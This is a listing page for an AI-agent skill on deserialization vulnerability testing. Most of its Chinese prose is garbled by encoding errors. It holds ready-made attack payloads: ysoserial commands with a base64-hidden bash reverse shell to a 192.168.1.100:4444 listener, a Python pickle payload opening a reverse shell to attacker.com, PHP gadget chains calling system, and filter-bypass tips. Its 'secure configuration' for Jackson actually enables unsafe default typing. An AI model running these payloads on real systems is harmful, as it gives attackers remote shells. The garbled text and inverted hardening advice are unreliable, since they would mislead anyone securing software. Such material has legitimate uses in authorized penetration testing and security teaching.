deserialization-testing
11
总安装量
10
周安装量
#27868
全站排名
安装命令
npx skills add https://github.com/ed1s0nz/cyberstrikeai --skill deserialization-testing
Agent 安装分布
codex
9
opencode
8
gemini-cli
8
github-copilot
8
kimi-cli
8
amp
8
Skill 文档
ååºååæ¼æ´æµè¯
æ¦è¿°
ååºååæ¼æ´æ¯ä¸ç§å©ç¨åºç¨ç¨åºååºååä¸å¯ä¿¡æ°æ®å¯¼è´çæ¼æ´ï¼å¯è½å¯¼è´è¿ç¨ä»£ç æ§è¡ãæç»æå¡çãæ¬æè½æä¾ååºååæ¼æ´çæ£æµãå©ç¨åé²æ¤æ¹æ³ã
æ¼æ´åç
åºç¨ç¨åºå°åºååçæ°æ®ååºåå为对象æ¶ï¼å¦ææ°æ®æ¥æºä¸å¯ä¿¡ï¼æ»å»è å¯ä»¥æé æ¶æåºååæ°æ®ï¼å¨ååºååè¿ç¨ä¸æ§è¡ä»»æ代ç ã
常è§æ ¼å¼
Java
常è§åºï¼
- Javaåçåºåå
- Jackson
- Fastjson
- XStream
- Apache Commons Collections
PHP
常è§å½æ°ï¼
- unserialize()
- json_decode()
Python
常è§æ¨¡åï¼
- pickle
- yaml
- json
.NET
常è§ç±»ï¼
- BinaryFormatter
- SoapFormatter
- DataContractSerializer
æµè¯æ¹æ³
1. è¯å«åºååæ°æ®
Javaåºååç¹å¾ï¼
AC ED 00 05 (åå
è¿å¶)
rO0 (Base64)
PHPåºååç¹å¾ï¼
O:8:"stdClass"
a:2:{s:4:"test";s:4:"data";}
Python pickleç¹å¾ï¼
\x80\x03
2. æ£æµååºååç¹
常è§ä½ç½®ï¼
- Cookieå¼
- Sessionæ°æ®
- APIåæ°
- æ件ä¸ä¼
- ç¼åæ°æ®
- æ¶æ¯éå
3. Javaååºåå
Apache Commons Collectionså©ç¨ï¼
// 使ç¨ysoserialçæPayload
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
常è§Gadgeté¾ï¼
- CommonsCollections1-7
- Spring1-2
- ROME
- Jdk7u21
4. PHPååºåå
åºç¡æµè¯ï¼
<?php
class Test {
public $cmd = "id";
function __destruct() {
system($this->cmd);
}
}
echo serialize(new Test());
// O:4:"Test":1:{s:3:"cmd";s:2:"id";}
?>
éæ¯æ¹æ³å©ç¨ï¼
- __destruct()
- __wakeup()
- __toString()
- __call()
5. Python pickle
åºç¡æµè¯ï¼
import pickle
import os
class RCE:
def __reduce__(self):
return (os.system, ('id',))
pickle.dumps(RCE())
å©ç¨ææ¯
Java RCE
使ç¨ysoserialï¼
# çæPayload
java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > payload.bin
# Base64ç¼ç
base64 -w 0 payload.bin
æå¨æé ï¼
// 使ç¨Gadgeté¾æé æ¶æ对象
// åèysoserialæºç
PHP RCE
å©ç¨POPé¾ï¼
<?php
class A {
public $b;
function __destruct() {
$this->b->test();
}
}
class B {
public $c;
function test() {
call_user_func($this->c, "id");
}
}
$a = new A();
$a->b = new B();
$a->b->c = "system";
echo serialize($a);
?>
Python RCE
Pickle RCEï¼
import pickle
import base64
import os
class RCE:
def __reduce__(self):
return (os.system, ('bash -i >& /dev/tcp/attacker.com/4444 0>&1',))
payload = pickle.dumps(RCE())
print(base64.b64encode(payload))
ç»è¿ææ¯
ç¼ç ç»è¿
Base64ç¼ç ï¼
åå§: rO0ABXNy...
ç¼ç : ck8wQUJYTnk...
URLç¼ç ï¼
%72%4F%00%AB...
è¿æ»¤å¨ç»è¿
使ç¨ä¸åGadgeté¾ï¼
- å¦æCommonsCollections被è¿æ»¤ï¼å°è¯Spring
- å¦ææ个çæ¬è¢«è¿æ»¤ï¼å°è¯å ¶ä»çæ¬
ç±»åæ··æ·
使ç¨åå°ï¼
Class.forName("java.lang.Runtime").getMethod("exec", String.class)
å·¥å ·ä½¿ç¨
ysoserial
# ååºå¯ç¨Gadget
java -jar ysoserial.jar
# çæPayload
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
# çæBase64
java -jar ysoserial.jar CommonsCollections1 "command" | base64
PHPGGC
# ååºå¯ç¨Gadget
./phpggc -l
# çæPayload
./phpggc Monolog/RCE1 system id
# çæç¼ç Payload
./phpggc -b Monolog/RCE1 system id
Burp Suite
- æ¦æªå å«åºååæ°æ®ç请æ±
- 使ç¨æ件çæPayload
- æ¿æ¢åå§æ°æ®
- è§å¯ååº
éªè¯åæ¥å
éªè¯æ¥éª¤
- 确认å¯ä»¥æ§å¶åºååæ°æ®
- éªè¯ååºåå触å代ç æ§è¡
- è¯ä¼°å½±åï¼RCEãæ°æ®æ³é²çï¼
- è®°å½å®æ´çPOC
æ¥åè¦ç¹
- æ¼æ´ä½ç½®ååºååæ°æ®æ ¼å¼
- 使ç¨çGadgeté¾æå©ç¨æ¹å¼
- å®æ´çå©ç¨æ¥éª¤åPoC
- ä¿®å¤å»ºè®®ï¼è¾å ¥éªè¯ã使ç¨å®å ¨åºååçï¼
é²æ¤æªæ½
æ¨èæ¹æ¡
-
é¿å ååºååä¸å¯ä¿¡æ°æ®
- 使ç¨JSONæ¿ä»£
- 使ç¨å®å ¨çåºååæ ¼å¼
-
è¾å ¥éªè¯
// ç½ååéªè¯ç±»å private static final Set<String> ALLOWED_CLASSES = Set.of("com.example.SafeClass"); private Object readObject(ObjectInputStream ois) { // éªè¯ç±»å // ... } -
使ç¨å®å ¨é ç½®
// Jacksoné ç½® objectMapper.enableDefaultTyping(); objectMapper.setVisibility(PropertyAccessor.FIELD, JsonAutoDetect.Visibility.ANY); -
ç±»å è½½å¨é离
- 使ç¨èªå®ä¹ClassLoader
- éå¶å¯å è½½çç±»
-
çæ§åæ¥å¿
- è®°å½ååºååæä½
- çæ§å¼å¸¸è¡ä¸º
注æäºé¡¹
- ä» å¨æææµè¯ç¯å¢ä¸è¿è¡
- 注æä¸åçæ¬åºçGadgeté¾å·®å¼
- æµè¯æ¶æ³¨æPayload大å°éå¶
- äºè§£ç®æ åºç¨çä¾èµåºçæ¬